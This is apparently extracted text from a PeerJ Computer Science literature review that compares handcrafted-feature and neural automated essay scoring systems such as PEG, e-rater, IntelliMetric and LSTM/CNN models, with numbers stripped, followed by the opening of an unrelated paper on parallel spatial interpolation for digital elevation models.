equation. to end, a score is determined by estimating coefficients (β weights) from the training stage (dikli, ). some issues have been marked as a criticism for the peg such as disregarding the semantic side of essays, focusing on surface structures, and not working effectively in case of receiving student responses directly (which might ignore writing errors). peg has a modified version released in , which focuses on grammar checking with a correlation between human assessors and the system (r = . ) (dikli, ; page, ; refaat, ewees & eisa, ). measurement inc. acquired the rights of peg in and continued to develop it. the modified peg analyzes the training essays and calculates more than features that reflect intrinsic characteristics of writing, such as fluency, diction, grammar, and construction. once the features have been calculated, the peg uses them to build statistical and linguistic models for the accurate prediction of essay scores (home—measurement incorporated, ). intelligent essay assessortm (iea) iea was developed by landauer ( ). iea uses a statistical combination of several measures to produce an overall score. it relies on using latent semantic analysis (lsa); a machine-learning model of human understanding of the text that depends on the training and calibration methods of the model and the ways it is used tutorially (dikli, ; foltz, gilliam & kendall, ; refaat, ewees & eisa, ). iea can handle students’ innovative answers by using a mix of scored essays and the domain content text in the training stage. it also spots plagiarism and provides feedback (dikli, ; landauer, ). it uses a procedure for assigning scores in a process that hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the iea architecture. full-size doi: . /peerjcs. /fig- begins with comparing essays to each other in a set. lsa examines the extremely similar essays. irrespective of the replacement of paraphrasing, synonym, or reorganization of sentences, the two essays will be similar lsa. plagiarism is an essential feature to overcome academic dishonesty, which is difficult to be detected by human-raters, especially in the case of grading a large number of essays (dikli, ; landauer, ). (fig. ) represents iea architecture (landauer, ). iea requires smaller numbers of pre-scored essays for training. on the contrary of other aes systems, iea requires only pre-scored training essays per each prompt vs. – on other systems (dikli, ). landauer ( ) used iea to score more than students’ answers in middle school. the results showed a . correlation value between iea and the human-raters. he explained the high correlation value due to several reasons including that human-raters could not compare each essay to each other for the students while iea can do so (dikli, ; landauer, ). e-rater r© educational testing services (ets) developed e-rater in to estimate the quality of essays in various assessments. it relies on using a combination of statistical and nlp techniques to extract linguistic features (such as grammar, usage, mechanics, development) from text to start processing, then compares scores with human graded essays (attali & burstein, ; dikli, ; ramineni & williamson, ). the e-rater system is upgraded annually. the current version uses features divided into two areas: writing quality (grammar, usage, mechanics, style, organization, development, word choice, average word length, proper prepositions, and collocation usage), and content or use of prompt-specific vocabulary (ramineni & williamson, ). the e-rater scoring model consists of two stages: the model of the training stage, and the model of the evaluation stage. human scores are used for training and evaluating the e-rater scoring models. the quality of the e-rater models and its effective functioning in an operational environment depend on the nature and quality of the training and evaluation hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. data (williamson, xi & breyer, ). the correlation between human assessors and the system ranged from . to . (refaat, ewees & eisa, ). criterionsm criterion is a web-based scoring and feedback system based on ets text analysis tools: e- rater r© and critique. as a text analysis tool, critique integrates a collection of modules that detect faults in usage, grammar, and mechanics, and recognizes discourse and undesirable style elements in writing. it provides immediate holistic scores as well (crozier & kennedy, ; dikli, ). criterion similarly gives personalized diagnostic feedback reports based on the types of assessment instructors give when they comment on students’ writings. this component of the criterion is called an advisory component. it is added to the score, but it does not control it[ ]. the types of feedback the advisory component may provide are like the following: • the text is too brief (a student may write more). • the essay text does not look like other essays on the topic (the essay is off-topic). • the essay text is overly repetitive (student may use more synonyms) (crozier & kennedy, ). intellimetrictm vantage learning developed the intellimetric systems in . it is considered the first aes system which relies on artificial intelligence (ai) to simulate the manual scoring process carried out by human-raters under the traditions of cognitive processing, computational linguistics, and classification (dikli, ; refaat, ewees & eisa, ). intellimetric relies on using a combination of artificial intelligence (ai), natural language processing (nlp) techniques, and statistical techniques. it uses cognisearch and quantum reasoning technologies that were designed to enable intellimetric to understand the natural language to support essay scoring (dikli, ). intellimetric uses three steps to score essays as follows: a) first, the training step that provides the system with known scores essays. b) second, the validation step examines the scoring model against a smaller set of known scores essays. c) finally, application to new essays with unknown scores. (learning, ; learning, ; shermis & barrera, ) intellimetric identifies text related characteristics as larger categories called latent semantic dimensions (lsd). (figure ) represents the intellimetric features model. intellimetric scores essays in several languages including english, french, german, arabic, hebrew, portuguese, spanish, dutch, italian, and japanese (elliot, ). according to rudner, garcia, and welch (rudner, garcia & welch, ), the average of the correlations between intellimetric and human-raters was . (refaat, ewees & eisa, ). hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the intellimetric features model. full-size doi: . /peerjcs. /fig- my access! my access is a web-based writing assessment system based on the intellimetric aes system. the primary aim of this system is to provide immediate scoring and diagnostic feedback for the students’ writings in order to motivate them to improve their writing proficiency on the topic (dikli, ). my access system contains more than prompts that assist in an immediate analysis of the essay. it can provide personalized spanish and chinese feedback on several genres of writing such as narrative, persuasive, and informative essays. moreover, it provides multilevel feedback—developing, proficient, and advanced—as well (dikli, ; learning, ). bayesian essay test scoring systemtm (betsy) betsy classifies the text based on trained material. it has been developed in by lawrence rudner at the college park of the university of maryland with funds from the us department of education (valenti, neri & cucchiarelli, ). it has been designed to automate essay scoring, but can be applied to any text classification task (taylor, ). betsy needs to be trained on a huge number ( , texts) of human classified essays to learn how to classify new essays. the goal of the system is to determine the most likely classification of an essay to a set of groups (pass-fail) and (advanced - proficient - basic - below basic) (dikli, ; valenti, neri & cucchiarelli, ). it learns how to classify a new document through the following steps: the first-word training step is concerned with the training of words, evaluating database statistics, eliminating infrequent words, and determining stop words. the second-word pairs training step is concerned with evaluating database statistics, eliminating infrequent word-pairs, maybe scoring the training set, and trimming misclassified training sets. finally, betsy can be applied to a set of experimental texts to identify the classification precision for several new texts or a single text. (dikli, ) betsy has achieved accuracy of over %, when trained with essays, and tested with essays (rudner & liang, ). hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the architectures of two models. (a) original c&w model. (b) augmented c&w model. full-size doi: . /peerjcs. /fig- figure the example of embeddings. (a) standard neural embeddings. (b) sswe word embeddings. full-size doi: . /peerjcs. /fig- automatic featuring aes systems automatic text scoring using neural networks alikaniotis, yannakoudakis, and rei introduced in a deep neural network model capable of learning features automatically to score essays. this model has introduced a novel method to identify the more discriminative regions of the text using: ( ) a score- specific word embedding (sswe) to represent words and ( ) a two-layer bidirectional long-short-term memory (lstm) network to learn essay representations. (alikaniotis, yannakoudakis & rei, ; taghipour & ng, ). alikaniotis and his colleagues have extended the c&w embeddings model into the augmented c&w model to capture, not only the local linguistic environment of each word, but also how each word subsidizes to the overall score of an essay. in order to capture sswes. a further linear unit has been added in the output layer of the previous model which performs linear regression, predicting the essay score (alikaniotis, yannakoudakis & rei, ). figure shows the architectures of two models, (a) original c&w model and (b) augmented c&w model. figure shows the example of (a) standard neural embeddings to (b) sswe word embeddings. hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sswes obtained by their model used to derive continuous representations for each essay. each essay is identified as a sequence of tokens. the uni- and bi-directional lstms have been efficiently used for embedding long sequences (alikaniotis, yannakoudakis & rei, ). they used the kaggle’s asap (https://www.kaggle.com/c/asap-aes/data) contest dataset. it consists of . essays, with average length -to- words per essay, each double marked (cohen’s= . ). the essays presented eight different prompts, each with distinct marking criteria and score range. results showed that sswe and the lstm approach, without any prior knowledge of the language grammar or the text domain, was able to mark the essays in a very human- like way, beating other state-of-the-art systems. furthermore, while tuning the models’ hyperparameters on a separate validation set (alikaniotis, yannakoudakis & rei, ), they did not perform any further preprocessing of the text other than simple tokenization. also, it outperforms the traditional svm model by combining sswe and lstm. on the contrary, lstm alone did not give significant more accuracies compared to svm. according to alikaniotis, yannakoudakis, and rei (alikaniotis, yannakoudakis & rei, ), the combination of sswe with the two-layer bi-directional lstm had the highest correlation value on the test set averaged . (spearman) and . (pearson). a neural network approach to automated essay scoring taghipour and h. t. ng developed in a recurrent neural networks (rnns) approach which automatically learns the relation between an essay and its grade. since the system is based on rnns, it can use non-linear neural layers to identify complex patterns in the data and learn them, and encode all the information required for essay evaluation and scoring (taghipour & ng, ). the designed model architecture can be presented in five layers as follow: a) the lookup table layer; which builds dlt dimensional space containing each word projection. b) the convolution layer; which extracts feature vectors from n-grams. it can possibly capture local contextual dependencies in writing and therefore enhance the performance of the system. c) the recurrent layer; which processes the input to generate a representation for the given essay. d) the mean over time; which aggregates the variable number of inputs into a fixed length vector. e) the linear layer with sigmoid activation; which maps the generated output vector from the mean-over-time layer to a scalar value (taghipour & ng, ). taghipour and his colleagues have used the kaggle’s asap contest dataset. they distributed the data set into % training set, % a development set, and % a testing set. they used quadratic weighted kappa (qwk) as an evaluation metric. for evaluating the performance of the system, they compared it to an available open source aes system called the ‘enhanced ai scoring engine’ (ease) (https://github.com/edx/ease). to identify the best model, they performed several experiments like convolutional vs. recurrent hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.kaggle.com/c/asap-aes/data https://github.com/edx/ease http://dx.doi.org/ . /peerj-cs. neural network, basic rnn vs. gated recurrent units (gru) vs. lstm, unidirectional vs. bidirectional lstm, and using with vs. without mean-over-time layer (taghipour & ng, ). the results showed multiple observations according to (taghipour & ng, ), summarized as follows: a) rnn failed to get accurate results as lstm or gru and the other models outperformed it. this was possibly due to the relatively long sequences of words in writing. b) the neural network performance was significantly affected with the absence of the mean over-time layer. as a result, it did not learn the task in an exceedingly proper manner. c) the best model was the combination of ten instances of lstm models with ten instances of cnn models. the new model outperformed the baseline ease system by . % and with averaged qwk value . . automatic features for essay scoring—an empirical study dong and zhang provided in an empirical study to examine a neural network method to learn syntactic and semantic characteristics automatically for aes, without the need for external pre-processing. they built a hierarchical convolutional neural network (cnn) structure with two levels in order to model sentences separately (dasgupta et al., ; dong & zhang, ). dong and his colleague built a model with two parts, summarized as follows: a) word representations: a word embedding is used but does not rely on pos-tagging or other pre-processing. b) cnn model: they took essay scoring as a regression task and employed a two- layer cnn model, in which one convolutional layer is used to extract sentences representations, and the other is stacked on sentence vectors to learn essays representations. the dataset that they employed in experiments is the kaggle’s asap contest dataset. the settings of data preparation followed the one that phandi, chai, and ng used (phandi, chai & ng, ). for domain adaptation (cross-domain) experiments, they followed phandi, chai, and ng (phandi, chai & ng, ), by picking four pairs of essay prompts, namely, → , → , → and → , where → denotes prompt one as source domain and prompt as target domain. they used quadratic weighted kappa (qwk) as the evaluation metric. in order to evaluate the performance of the system, they compared it to ease system (an open source aes available for public) with its both models bayesian linear ridge regression (blrr) and support vector regression (svr). the empirical results showed that the two-layer convolutional neural network (cnn) outperformed other baselines (e.g., bayesian linear ridge regression) on both in-domain and domain adaptation experiments on the kaggle’s asap contest dataset. so, the neural features learned by cnn were very effective in essay marking, handling more high-level and abstract information compared to manual feature templates. in domain average, qwk value was . vs. . for human rater (dong & zhang, ). hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. augmenting textual qualitative features in deep convolution recurrent neural network for automatic essay scoring in , dasgupta et al. ( ) proposed a qualitatively enhanced deep convolution recurrent neural network architecture to score essays automatically. the model considers both word- and sentence-level representations. using a hierarchical cnn connected with a bidirectional lstm model they were able to consider linguistic, psychological and cognitive feature embeddings within a text (dasgupta et al., ). the designed model architecture for the linguistically informed convolution rnn can be presented in five layers as follow: a) generating embeddings layer: the primary function is constructing previously trained sentence vectors. sentence vectors extracted from every input essay are appended with the formed vector from the linguistic features determined for that sentence. b) convolution layer: for a given sequence of vectors with k windows, this layer function is to apply linear transformation for all these k windows. this layer is fed by each of the generated word embeddings from the previous layer. c) long short-term memory layer: the main function of this layer is to examine the future and past sequence context by connecting bidirectional lstms (bi-lstm) networks. d) activation layer: the main function of this layer is to obtain the intermediate hidden layers from the bi-lstm layer h , h ,..., h t, and in order to calculate the weights of sentence contribution to the final essay’s score (quality of essay). they used an attention pooling layer over sentence representations. e) the sigmoid activation function layer: the main function of this layer is to perform a linear transformation of the input vector that converts it to a scalar value (continuous) (dasgupta et al., ). figure represents the proposed linguistically informed convolution recurrent neural network architecture. dasgupta and his colleagues employed in their experiments the kaggle’s asap contest dataset. they have done folds using cross validation technique to assess their models. every fold is distributed as follows; training set which represents % of the data, development set represented by %, and the rest % as the test set. they used quadratic weighted kappa (qwk) as the evaluation metric. the results showed that, in terms of all these parameters, the qualitatively enhanced deep convolution lstm (qe-c-lstm) system performed better than the existing, lstm, bi-lstm and ease models. it achieved a pearson’s and spearman’s correlation of . and . respectively as compared to that of . and . in alikaniotis, yannakoudakis & rei ( ). they also accomplished an rmse score of . . they computed a pairwise cohen’s k value of . as well (dasgupta et al., ). summary and discussion over the past four decades, there have been several studies that examined the approaches of applying computer technologies on scoring essay questions. recently, computer hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the proposed linguistically informed convolution recurrent neural network architecture. full-size doi: . /peerjcs. /fig- technologies have been able to assess the quality of writing using aes technology. many attempts have taken place in developing aes systems in the past years (dikli, ). the aes systems do not assess the intrinsic qualities of an essay directly as human-raters do, but they utilize the correlation coefficients of the intrinsic qualities to predict the score to be assigned to an essay. the performance of these systems is evaluated based on the comparison of the scores assigned to a set of essays scored by expert humans. the aes systems have many strengths mainly in reducing labor-intensive marking activities, overcoming time, cost, and improving the reliability of writing tasks. besides, they ensure a consistent application of marking criteria, therefore facilitating equity in scoring. however, there is a substantial manual effort involved in reaching these results on different domains, genres, prompts, and so forth. moreover, the linguistic features intended to capture the aspects of writing to be assessed are hand-selected and tuned for specific domains. in order to perform well on different data, separate models with distinct feature sets are typically tuned (burstein, ; dikli, ; hamp-lyons, ; rudner & gagne, ; rudner & liang, ). despite its weaknesses, the aes systems continue to attract the attention of public schools, universities, testing agencies, researchers and educators (dikli, ). the aes systems described in this paper under the first category are based on handcrafted features and, usually, rely on regression methods. they employ several methods to obtain the scores. while e-rater and intellimetric use nlp techniques, the iea system utilizes lsa. moreover, peg utilizes proxy measures (proxes), and betsytm uses bayesian procedures to evaluate the quality of a text. while e-rater, intellimetric, and betsy evaluate style and semantic content of essays, peg only evaluates style and ignores the semantic aspect of essays. furthermore, iea is exclusively concerned with semantic content. unlike peg, e-rater, intellimetric, and iea hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. need smaller numbers of pre-scored essays for training in contrast with betsy which needs a huge number of training pre-scored essays. the systems in the first category have high correlations with human-raters. while peg, e-rater, iea, and betsy evaluate only english language essay responses, intellimetric evaluates essay responses in multiple languages. contrary to peg, iea, and betsy, e-rater, and intellimetric have instructional or immediate feedback applications (i.e., criterion and my access!). instructional-based aes systems have worked hard to provide formative assessments by allowing students to save their writing drafts on the system. thus, students can review their writings as of the formative feedback received from either the system or the teacher. the recent version of my access! ( . ) provides online portfolios and peer review. the drawbacks of this category may include the following: (a) feature engineering can be time-consuming, since features need to be carefully handcrafted and selected to fit the appropriate model, and (b) such systems are sparse and instantiated by discrete pattern-matching. aes systems described in this paper under the second category are usually based on neural networks. neural networking approaches, especially deep learning techniques, have been shown to be capable of inducing dense syntactic and semantic features automatically, applying them to text analysis and classification problems including aes systems (alikaniotis, yannakoudakis & rei, ; dong & zhang, ; taghipour & ng, ), and giving better results with regards to the statistical models used in the handcrafted features (dong & zhang, ). recent advances in deep learning have shown that neural approaches to aes achieve state-of-the-art results (alikaniotis, yannakoudakis & rei, ; taghipour & ng, ) with the additional advantage of utilizing features that are automatically learned from the data. in order to facilitate interpretability of neural models, a number of visualization techniques have been proposed to identify textual (superficial) features that contribute to model performance [ ]. while alikaniotis and his colleagues ( ) employed a two-layer bidirectional lstm combined with the sswe for essay scoring tasks, taghipour & ng ( ) adopted the lstm model and combined it with cnn. dong & zhang ( ) developed a two-layer cnn, and dasgupta and his colleagues ( ) proposed a qualitatively enhanced deep convolution lstm. unlike alikaniotis and his colleagues ( ), taghipour & ng ( ), dong & zhang ( ), dasgupta and his colleagues ( ) were interested in word-level and sentence-level representations as well as linguistic, cognitive and psychological feature embeddings. all linguistic and qualitative features were figured off-line and then entered in the deep learning architecture. although deep learning-based approaches have achieved better performance than the previous approaches, the performance may not be better using the complex linguistic and cognitive characteristics, which are very important in modeling such essays. see table for the comparison of aes systems. in general, there are three primary challenges to aes systems. first, they are not able to assess essays as human-raters do because they do what they have been programmed to do hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the comparison of aes systems. aes/parameter vendor release date primary focus technique(s) used training data feedback applica- tion correlation with human raters’ scores pegtm ellis page style statistical yes ( – ) no . ieatm landauer, foltz, & laham content lsa (kat en- gine by pear- son) yes (∼ ) yes . e-rater r© ets development team style & content nlp yes (∼ ) yes (crite- rion) ∼ . intellimetrictm vantage learning style & content nlp yes (∼ ) yes (my access!) ∼ . betsytm rudner style & content bayesian text classification yes ( ) no ∼ . alikaniotis, yan- nakoudakis & rei ( ) alikaniotis, yan- nakoudakis, and rei style & content sswe + two- layer bi-lstm yes (∼ ) no ∼ . (spear- man)∼ . (pearson) taghipour & ng ( ) taghipour and ng style & content adopted lstm yes (∼ ) no qwk for lstm ∼ . dong & zhang ( ) dong and zhang syntactic and seman- tic features word embed- ding and a two- layer convo- lution neural network yes (∼ to ∼ ) no average kappa ∼ . versus . for hu- man dasgupta et al. ( ) dasgupta, t., naskar, a., dey, l., & saha, r. style, content, lin- guistic and psycho- logical deep convolu- tion recurrent neural network yes ( ∼ to ) no pearson’s and spearman’s correlation of . and . respectively notes. scorers. (page, ). they eliminate the human element in writing assessment and lack the sense of the rater as a person (hamp-lyons, ). this shortcoming was somehow overcome by obtaining high correlations between the computer and human-raters (page, ) although this is still a challenge. the second challenge is whether the computer can be fooled by students or not (dikli, ). it is likely to ‘‘trick’’ the system by writing a longer essay to obtain higher score for example (kukich, ). studies, such as the gre study in , examined whether a computer could be deceived and assign a lower or higher score to an essay than it should deserve or not. the results revealed that it might reward a poor essay (dikli, ). the developers of aes systems have been utilizing algorithms to detect students who try to cheat. although automatic learning aes systems based on neural networks algorithms, the handcrafted aes systems transcend automatic learning systems in one important feature. handcrafted systems are highly related to the scoring rubrics that have been designed as a criterion for assessing a specific essay and human-raters use these rubrics to score essays hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a well. the objectivity of human-raters is measured by their commitment to the scoring rubrics. on the contrary, automatic learning systems extract the scoring criteria using machine learning and neural networks, which may include some factors that are not part of the scoring rubric, and, hence, is reminiscent of raters’ subjectivity (i.e., mode, nature of a rater’s character, etc.) considering this point, handcrafted aes systems may be considered as more objective and fairer to students from the viewpoint of educational assessment. the third challenge is measuring the creativity of human writing. accessing the creativity of ideas and propositions and evaluating their practicality are still a pending challenge to both categories of aes systems which still needs further research. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • mohamed abdellatif hussein conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. • hesham hassan and mohammad nassef authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: as this is a literature, review, there was no raw data. references alikaniotis d, yannakoudakis h, rei m. . automatic text scoring using neural net- works. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers). stroudsburg: association for computational linguistics, – doi . /v /p - . attali y, burstein j. . automated essay scoring with e-rater r© v. . . ets research report series ( ):i– doi . /j. - . .tb .x. burstein j. . the e-rater scoring engine: automated essay scoring with natural language processing. in: shermis md, burstein j, eds. automated essay scoring: a cross-disciplinary approach. mahwah: lawrence erlbaum associates, – . crozier ww, kennedy gja. . marine exploitation of atlantic salmon (salmo salar l.) from the river bush, northern ireland. fisheries research ( – ): – doi . / - ( ) - . hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /v /p - http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. dasgupta t, naskar a, saha r, dey l. . augmenting textual qualitative features in deep convolution recurrent neural network for automatic essay scoring. in: proceed- ings of the th workshop on natural language processing techniques for educational applications. melbourne, australia, july , . stroudsburg: association for computational linguistics, – . available at http://aclweb.org/anthology/w - . dikli s. . an overview of automated scoring of essays. the journal of technology, learning, and assessment ( ): – . dong f, zhang y. . automatic features for essay scoring—an empirical study. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – doi . /v /d - . elliot s. . intellimetric: from here to validity. in: automated essay scoring: a cross- disciplinary perspective. – . farag y, yannakoudakis h, briscoe t. . neural automated essay scoring and coherence modeling for adversarially crafted input. in: proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers). association for computational linguistics louisiana, usa, – doi . /v /n - . foltz pw, gilliam s, kendall s. . supporting content-based feedback in on-line writing evaluation with lsa. interactive learning environments ( ): – doi . / - ( ) : ; -b;ft . hamp-lyons l. . fourth generation writing assessement. in: silva t, matsuda pk, eds. on second language writing. vol. . mahwah: lawrence erlbaum, – . home—measurement incorporated. . available at http://www.measurementinc. com/ (accessed on february ). isaacs t, zara c, herbert g, coombs sj, smith c. . key concepts in educa- tional assessment [electronic resource]. thousand oaks: sage publications ltd doi . / . kukich k. . beyond automated essay scoring, the debate on automated essay grading. ieee intelligent systems ( ): – . landauer tk. . automatic essay assessment. assessment in education: principles, policy & practice ( ): – doi . / . learning v. . a true score study of intellimetric accuracy for holistic and dimensional scoring of college entry-level writing program (rb- ). newtown: vantage learning. learning v. . a true score study of th grade student writing responses using intelli- metric version . (rb- ). newtown: vantage learning, . nitko aj, brookhart sm. . educational assessment of students. th edition. new jersey: pearson merrill prentice hall. page eb. . computer grading of student prose, using modern concepts and software. journal of experimental education ( ): – doi . / . . . hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://aclweb.org/anthology/w - http://aclweb.org/anthology/w - http://dx.doi.org/ . /v /d - http://dx.doi.org/ . /v /n - http://dx.doi.org/ . / - ( ) : ; -b;ft http://www.measurementinc.com/ http://www.measurementinc.com/ http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. page eb. . project essay grade: peg. in: automated essay scoring: a cross-disciplinary perspective. mahwah: lawrence erlbaum associates publishers, – . peng x, ke d, xu b. . automated essay scoring based on finite state transducer: towards asr transcription of oral english speech. in: proceedings of the th annual meeting of the association for computational linguistics: long papers-volume . association for computational linguistics, – . phandi p, chai kma, ng ht. . flexible domain adaptation for automated essay scoring using correlated linear regression. in: proceedings of the conference on empirical methods in natural language processing. lisbon: association for computational linguistics, – doi . /v /d - . ramineni c, williamson d. . understanding mean score differences between the e-rater r© automated scoring engine and humans for demographically based groups in the gre r© general test. ets research report series ( ): – doi . /isie. . . refaat mm, ewees aa, eisa mm. . automated assessment of students’ arabic free- text answers. international journal of intelligent computing and information science ( ): – . rudner l, gagne p. . an overview of three approaches to scoring written essays by computer. practical assessment, research & evaluation ( ). rudner lm, garcia v, welch c. . an evaluation of the intellimetricsm essay scoring system. the journal of technology, learning and assessment ( ): – . rudner lm, liang t. . automated essay scoring using bayes’ theorem. the journal of technology, learning, and assessment ( ): – . shermis md, barrera fd. . exit assessments evaluating writing ability through automated essay scoring. in: annual meeting of the american educational research association, new orleans, la, – . available at https://eric.ed.gov/?id=ed . stecher bm, rahn m, ruby a, alt m, robyn a, ward b. . using alternative assess- ments in vocational education. rand-publications-mr-all series. berkeley: rand and university of california. taghipour k, ng ht. . a neural approach to automated essay scoring. in: proceedings of the conference on empirical methods in natural language pro- cessing. stroudsburg: association for computational linguistics, – doi . /v /d - . taylor ar. . a future in the process of arrival: using computer technologies for the assessment of student learning. kelowna: society for advancement of excellence in education. valenti s, neri f, cucchiarelli a. . an overview of current research on automated essay grading. journal of information technology education: research : – doi . / . williamson dm, xi x, breyer fj. . a framework for evaluation and use of automated scoring. educational measurement: issues and practice ( ): – doi . /j. - . . .x. hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /v /d - http://dx.doi.org/ . /isie. . https://eric.ed.gov/?id=ed http://dx.doi.org/ . /v /d - http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. submitted august accepted february published march corresponding authors guoxiang yang, yanggx@cugb.edu.cn gang mei, gang.mei@cugb.edu.cn academic editor stefan steiniger additional information and declarations can be found on page doi . /peerj-cs. copyright tu et al. distributed under creative commons cc-by . open access comparative investigation of parallel spatial interpolation algorithms for building large-scale digital elevation models jingzhi tu, guoxiang yang, pian qi, zengyu ding and gang mei school of engineering and technology, china university of geoscience (beijing), beijing, china abstract the building of large-scale digital elevation models (dems) using various interpola- tion algorithms is one of the key issues in geographic information science. different choices of interpolation algorithms may trigger significant differences in interpolation accuracy and computational efficiency, and a proper interpolation algorithm needs to be carefully used based on the specific characteristics of the scene of interpolation. in this paper, we comparatively investigate the performance of parallel radial basis function (rbf)-based, moving least square (mls)-based, and shepard’s interpolation algorithms for building dems by evaluating the influence of terrain type, raw data density, and distribution patterns on the interpolation accuracy and computational efficiency. the drawn conclusions may help select a suitable interpolation algorithm in a specific scene to build large-scale dems. subjects distributed and parallel computing, spatial and geographic information systems keywords digital elevation model (dem), spatial interpolation, radial basis function (rbf), moving least square (mls), parallel algorithm, graphics processing unit (gpu), geographic information system(gis) introduction digital elevation model (dem) is a numerical representation of topography made up of equal-sized grid cells, each with a value of elevation. one of the most important scientific challenges of digital elevation modeling is the inefficiency of most interpolation algorithms in dealing with a large amount of data produced by large-scale dem with a fine resolution. to solve the problem, one of the common strategies is to parallelize interpolation algorithms on various high performance computing (hpc) platforms. for different large-scale dem, different parallel spatial interpolation algorithms are usually specifically selected, because a variety of spatial interpolation algorithms exist that behave differently for different data configurations and landscape conditions. consequently, the accuracy of a dem is sensitive to the interpolation technique, and it is significant to understand how the various algorithms affect a dem. therefore, this study is being conducted. spatial interpolation is a category of important algorithms in the field of geographic information. siu-nganlam ( ) had a review of various interpolation algorithms, how to cite this article tu j, yang g, qi p, ding z, mei g. . comparative investigation of parallel spatial interpolation algorithms for building large-scale digital elevation models. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:yanggx@cugb.edu.cn mailto:gang.mei@cugb.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. including most distance-weighting methods, kriging, spline interpolation, interpolating polynomials, finite-difference methods, power-series trend models, fourier models, distance-weighted least-squares, and least-squares fitting with splines. many spatial interpolation algorithms are used to build dems, for example, the shepard’s method (idw) (shepard, ), the kriging method (krige, ), the discrete smoothing interpolation (dsi) method (mallet, ), the radial basis function (rbf)-based method (powell, ), and the moving least squares (mls)-based method (lancaster & salkauskas, ). much research work (gumus & sen, ; chaplot et al., ; aguilar et al., ; khairnar et al., ; polat, uysal & toprak, ; rishikeshan et al., ) has been conducted to evaluate the effects of different interpolation methods on the precision of dem interpolation. in the comparative investigation of spatial interpolation algorithms for building dems, quite a few studies specifically focused on the impact of data samples and terrain types on interpolation accuracy; among them, gumus & sen ( ) compared the accuracy of various interpolation methods at different point distributions, the interpolation performance of idw is worse than other algorithms for the same data distribution. for the same algorithm, in the case of using all points and grid, their experimental results show that the best interpolation performances are modified shepard’s (ms) for random distribution; multiquadric radial basis function (mrbf) for curvature distribution, and inverse distance weighted (idw) for uniform distribution. chaplot et al. ( ) and aguilar et al. ( ) evaluated the effects of landform types and the density of the original data on the accuracy of dem production, their results show that interpolation algorithms perform well at higher sampling densities, and mrbf provided significantly better interpolation than idw in rough or non-uniform terrain. at lower sampling densities, when the spatial structure of height was strong, kriging yielded better estimates. when the spatial structure of height was weak, idw and regularized spline with tension (rst) performed better. on the other hand, mrbf performed well in the mountainous areas and ordinary kriging (ok) was the best for multi-scales interpolations in the smooth landscape. in addition, zhang ( ) established a descriptive model of local terrain features to study the correlation of surface roughness indicators and spatial distribution indicators for dem interpolation algorithms. (chaplot et al., ). ghandehari, buttenfield & farmer ( ) illustrated that the bi-quadratic and bi- cubic interpolation methods outperform weighted average, linear, and bi-linear methods at coarse resolutions and in rough or non-uniform terrain. aguilar et al. ( ) pointed out that mrbf is better than multilog function for low sample densities and steeper terrain. with the increasing size of dems, it is increasingly necessary to design parallel solutions for existing sequential algorithms to speed up processing. when adopting an interpolation method to deal with a large dem, the computational cost would be quite expensive, and the computational efficiency would especially be unsatisfied. the techniques in hpc are widely used to improve computational efficiency in various science and engineering applications such as surface modeling (yan et al., ), spatial point pattern analysis (zhang, zhu & huang, ), urban growth simulation (guan et al., ), delaunay triangulation (dt) for gis (coll & guerrieri, ), spatial tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. interpolation (wang, guan & wu, ; cheng, ; mei, ; mei, xu & xu, ; mei, ; mei, xu & xu, ; ding et al., b), and image processing (wasza et al., ; lei et al., ; yin et al., ; wu, deng & jeon, ). one of the effective strategies to solve the problem is to perform the dem interpolation in parallel on various parallel computing platforms such as shared-memory computers, distributed-memory computers, or even clusters. the parallelization of dem interpolation can be developed with the computational power of modern multicore central processing units (cpus) and many-core graphics processing units (gpus). for example, zhou et al. ( ) proposed a parallel open multi-processing (openmp)- and message passing interface (mpi)-based implementation of the priority-flood algorithm that identifies and fills depressions in raster dems. yan et al. ( ) accelerated high-accuracy surface modeling 